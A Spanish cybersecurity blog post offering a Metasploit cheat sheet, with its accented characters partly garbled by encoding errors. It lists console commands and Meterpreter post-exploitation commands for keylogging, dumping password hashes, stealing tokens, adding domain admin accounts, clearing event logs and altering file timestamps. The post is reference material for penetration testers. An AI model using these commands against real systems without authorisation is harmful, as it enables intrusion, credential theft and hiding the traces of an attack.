Log in
Blog HbS
Slider

Blog de Ciberseguridad y Hacking

Metasploit (cheat sheet)

metasploit

El framework Metasploit es una herramienta de c√≥digo abierto desarrollada en ruby, pod√©is incluso a√Īadir vuestros propios desarrollos en ella (si no sab√©is como apuntaos a nuestro curso de hacking √©tico). Esta herramienta es muy utilizada para realizar pentesting, tanto para comprometer sistemas como para obtener datos antes y despu√©s de comprometerlo.

Pero Metasploit tiene muchos comandos y como nuestra cabeza muchas veces no da para más (al menos la mía), necesitamos una chuleta para recordarlos, aquí os dejo una.

Comandos de la consola de metasploit‚Äč 

‚Äčshow exploits‚Äč ‚ÄčMostrar todos los exploits del Framework.
‚Äčshow payloads
‚ÄčMostrar todos los payloads del Framework.
‚Äčshow auxiliary
‚ÄčMostrar todos los m√≥dulos auxiliares del Framework.
‚Äčsearch [cadena]
‚ÄčB√ļsqueda por cadena
‚Äčsearch type:[exploit, payload, auxiliary, encoder, post] [cadena]
‚ÄčB√ļsqueda por tipo y cadena
‚Äčinfo‚Äč‚ÄčMuestra informaci√≥n acerca de un exploit cargado.
‚Äčuse [cadena]
‚ÄčCarga el exploit indicado.
‚ÄčLHOST‚Äč‚ÄčVariable local host
‚ÄčRHOST‚Äč‚ÄčVariable host remoto
‚Äčset [par√°metro] [valor]
‚ÄčGraba en el par√°metro el valor indicado.
‚Äčsetg[par√°metro] [valor]
‚ÄčGraba en valor para el par√°metro indicado de forma global.
‚Äčshow options
‚ÄčMuestra las opciones de un exploit.
‚Äčshow targets
‚ÄčMuestra las plataformas objetivo del exploit.
‚Äčset target [n√ļmero]
‚ÄčEspecifica un objetivo concreto de los posibles.
‚Äčset payload [payload]
‚ÄčEspecifica un payload a usar..
‚Äčshow advanced
‚ÄčMuestra las opciones avanzadas.
‚Äčset autorunscript migrate -f
‚ÄčMigra el proceso a un hilo independiente de forma autom√°tica.
‚Äčcheck‚Äč‚ÄčComprueba si un objetivo es vulnerable a un exploit.
‚Äčexploit‚Äč‚ÄčEjecuta un exploit
‚Äčexploit -j
‚ÄčEjecuta un exploit en background.
‚Äčexploit -z
‚ÄčNo interact√ļa con la sesi√≥n despu√©s de acceder con √©xito
‚Äčexploit -e encoder
‚ÄčEspecifica el encoder a usar con el payload
‚Äčexploit -h
‚ÄčMuestra la ayuda para el exploit especificado
‚Äčsessions -l
‚ÄčMuestra la lista de sesiones disponibles
‚Äčsessions -l -v
‚ÄčMuestra la lista de sesiones disponibles en modo verbose
‚Äčsessions -s [script]
‚ÄčEjecuta un script espec√≠fico en todas las sesiones de meterpreter activas.
‚Äčsessions -K
‚ÄčMata todas las sesiones activas
‚Äčsessions -c cmd
‚ÄčEjecuta un comando en todas las sesiones activas
‚Äčsessions -u sessionID
‚ÄčActualiza una shell de Win32 a una consola de meterpreter
‚Äčdb_create [nombre]
‚ÄčCrea una base de datos
‚Äčdb_connect [nombre]
‚ÄčCrea y se conecta a una base de datos
‚Äčdb_nmap
‚ÄčUsa y carga los resultados de Nmap en una base de datos
‚Äčdb_autopwn -h
‚ÄčMuestra la ayuda para usar db_autopwn.
‚Äčdb_autopwn -p -r -e
‚ÄčEjecuta db_autopwn contra todos los puertos encontrados, usa una shell reversa y los explota.
‚Äčdb_destroy
‚ÄčElimina la actual base de datos
‚Äčdb_destroy [usuario]:[contrase√Īa]@[host]:[puerto]/[base_de_datos]
‚ÄčBorra una base de datos concreta

Comandos de Meterpreter 

‚Äčhelp‚Äč ‚ÄčMuestra la ayuda.
‚Äčrun [script]
‚ÄčEjecuta un script de meterpreter
‚Äčsysinfo‚Äč‚ÄčMuestra la informaci√≥n del sistema comprometido
‚Äčls‚Äč‚ÄčMuestra los ficheros y directorios del sistema comprometido
‚Äčuse priv
‚ÄčCarga librer√≠as para elevar privilegios
‚Äčps‚Äč‚ÄčMuestra los procesos en ejecuci√≥n
‚Äčmigrate PID
‚ÄčMigra un proceso espec√≠fico.
‚Äčuse incognito
‚ÄčCarga las librer√≠as de inc√≥gnito.
‚Äčlist_tokens -u
‚ÄčMuestra los tokens disponibles por usuario
‚Äčlist_tokens -g
‚ÄčMuestra los tokens disponibles por grupo
‚Äčimpersonate_token [dominio]\\[usuario]
‚ÄčApropiaci√≥n de un token disponible del objetivo.
‚Äčsteal_token PID
‚ÄčApropiaci√≥n de un token disponible de un proceso dado
‚Äčdrop_token
‚ÄčDeja de usar el token actual
‚Äčgetsystem‚Äč‚ÄčIntenta elevar los privilegios del usuario de acceso.
‚Äčshell‚Äč‚ÄčEjecuta una Shell interactiva
‚Äčexecute -f cmd.exe -i
‚ÄčEjecuta cmd.exe e interact√ļa con √©l
‚Äčexecute -f cmd.exe -i -t
‚ÄčEjecuta cmd.exe con todos los tokens disponibles
‚Äčexecute -f cmd.exe -i -H -t
‚ÄčEjecuta cmd.exe con todos los tokens disponibles y lo convierte en un proceso oculto.
‚Äčrev2self
‚ÄčRetorna al usuario original que comprometi√≥ el sistema
‚Äčreg [comando]
‚ÄčEjecuta comandos en el registro del sistema comprometido
‚Äčsetdesktop [n√ļmero]
‚ÄčCambia de pantalla
‚Äčscreenshot‚Äč‚ÄčToma una captura de pantalla del objetivo
‚Äčupload file
‚ÄčCarga un fichero en el objetivo
‚Äčdownload file
‚ÄčDescarga un fichero del objetivo
‚Äčkeyscan_start
‚ÄčComienza el sniffing del teclado.
‚Äčkeyscan_dump
‚ÄčVuelca las teclas pulsadas del sistema objetivo.
‚Äčkeyscan_stop
‚ÄčPara el sniffing del teclado.
‚Äčgetprivs‚Äč‚ÄčIntenta elevar privilegios.
‚Äčuictl enable keyboard/mouse
‚ÄčToma el control del teclado o rat√≥n.
‚Äčbackground‚Äč‚ÄčSale de meterpreter sin cerrar la sesi√≥n.
‚Äčhashdump‚Äč‚ÄčObtiene todos los hashes del objetivo.
‚Äčuse sniffer
‚ÄčCarga las librer√≠as para esnifar.
‚Äčsniffer_interfaces
‚ÄčLista los interfaces disponibles.
‚Äčsniffer_dump [interfaceID] pcapname
‚ÄčComienza a esnifar un interfaz.
‚Äčsniffer_start [interfaceID] packet-buffer
‚ÄčComienza a esnifar un rango espec√≠fico.
‚Äčsniffer_stats [interfaceID]
‚ÄčPara obtener estad√≠sticas de la interfaz.
‚Äčsniffer_stop interfaceID
‚ÄčDetiene el sniffer.
‚Äčadd_user [usuario] [contrase√Īa] -h [ip]
‚ÄčA√Īade un usuario en el sistema objetivo.
‚Äčadd_group_user "Domain Admins" [usuario] -h [ip]
‚ÄčA√Īade un usuario al grupo de administradores en el sistema objetivo.
‚Äčclearev‚Äč‚ÄčVac√≠a el log de eventos del sistema comprometido
‚Äčtimestomp
‚ÄčCambia los atributos de un fichero.
‚Äčreboot‚Äč‚ÄčReinicia el sistema

Y eso es todo, ¬Ņson unos cuantos eh?

Always Learning.

Github secrets (o no tan secretos)
Diario de guerra de un comercial inform√°tico (Cap....

Artículos relacionados

Agrega tu email para recibir novedades de seguridad
Estoy de acuerdo con el Términos y Condiciones